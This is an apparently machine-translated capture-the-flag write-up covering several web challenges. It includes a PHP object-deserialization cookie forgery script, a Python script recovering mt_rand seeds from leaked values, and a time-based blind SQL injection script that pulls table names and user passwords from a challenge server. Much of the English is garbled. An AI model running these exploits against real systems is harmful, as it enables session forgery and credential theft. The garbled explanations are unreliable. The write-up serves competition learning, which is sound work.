-Ordinal scale battle sequences
First source.zip
get the source code, that need to get rank
to a flag you can get
first find out if there is deserialized points, found in the constructor monster class unserialize
method
to find where it can make rank
value becomes 1 Rank in class destructor found ways to $_SESSION['rank']
become a place of
if we meet $this->key === $this->serverKey
, that can be modified $_SESSION['rank']
, then the first certainty is serialized object is an Rank
object class, and the class of public property $rank
is 1.
So how to meet $this->key === $this->serverKey
it.
$this->serverKey = $_SERVER['key']
, That serverKey
is modified to an unknown quantity, we controlled key
the needs and its strong equal. This is not difficult to think that we can follow to achieve dynamic key
and serverKey
always the same, that is $this->key = &$this->serverKey
. It should be noticed key
and serverKey
two are private property and can not be accessed outside the class and modify it. So we only need to write a constructor within the class.
public function __construct(){
$this->key = &$this->serverKey;
}
After the visit to meet at the Monster
constructor of the class object, it is important that Monster
the properties of the object class $encryptKey
is unknown to us, if we know the value they can meet the requirements of the introduction of anti-cookie, knowledge used here is equivalent to a logical loopholes
in this cycle which will $this->encryptKey
be brought into circulation, if we $playername
assigned %s
, which can be $this->encryptKey
directly taken out
with $this->encryptKey
that is the thrust reverser can complete the construction of the cookie, directly attached to the next script, note the name of the registered user also participated in secret key calculations
<?php
class Rank
{
private $rank = 1;
private $serverKey; // 服务器的 Key
private $key;
public function __construct(){
$this->key = &$this->serverKey;
}
}
$a = new Rank();
$key = 'gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL';
$data = ['gappp',$key];
$encryptkey = '';
foreach($data as $key =>$value)
{
$encryptkey .=md5($encryptkey.$value);
}
$key = md5(serialize($a).$encryptkey);
$end = base64_encode(serialize($a).$key);
echo $end;
Replace cookie can
Second serve into the soul
Think of using random number seed blasting script obtains the random number seed, but the feeling does not seem enough time, reference
https://www.anquanke.com/post/id/196831
Simply means that you can take advantage of the first generation of random numbers 0 and 227 generated random number to calculate the random number seed
directly attached to the script
import os
import re
import requests
s = requests.session()
url = "https://twoshot.hgame.n3ko.co/random.php?times=228"
cookie = {'PHPSESSID':'6s7cbsqbpjgn9l4883sgbovfu6'}
c = s.get(url,cookies = cookie)
ans = str(c.text)
ans = eval(ans)
R0 = ans[0]
R227 = ans[227]
req = 'python reverse_mt_rand.py '+str(R0)+' '+str(R227)+' 0 0'
p = os.popen(req)
x = p.read()
p.close()
x = str(x.replace('\n',''))
url2 = "https://twoshot.hgame.n3ko.co/verify.php"
data = {"ans":x}
final = s.post(url = url2,cookies = cookie,data = data)
print(final.text)
Remember the same directory as the script into the calculation script
Cosmos secondary market
Bp threads using low buy, sell high thread, time purchase 100, sold 200; buy thread 50, the thread 100 can be sold
Cosmos message board -2
Log in and place all the registered filters in addition to alphanumeric symbols in delete_id
found at the injection point, because there is no echo, using time-based blind, directly attached to the script, and ran out of the user name and password to
import requests
import time
result = ""
cookie ={"PHPSESSID":"ps8l1kh75fac4kft6uumr02kot"}
for i in range(1,50):
print("正在测试第",i)
for j in range(37,127):
url = "http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)%3ddatabase()),"+str(i)+",1))%3d"+str(j)+",sleep(5),1)%23"
#url = "http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)%3d'user'),"+str(i)+",1))%3d"+str(j)+",sleep(5),1)%23"
#url = "http://139.199.182.61:19999/index.php?method=delete&delete_id=if(ascii(substr((select(group_concat(password))from(user)),"+str(i)+",1))%3d"+str(j)+",sleep(5),1)%23"
one_time = time.time()
r = requests.get(url,cookies=cookie)
#print(r.text)
two_time = time.time()
if two_time-one_time >= 5:
result = result+chr(j)
print('answer:',result)
Cosmos chat rooms 2.0
Too dishes, CSP did not find this point do not know how to upload bypassed, and so obediently reproduce the wp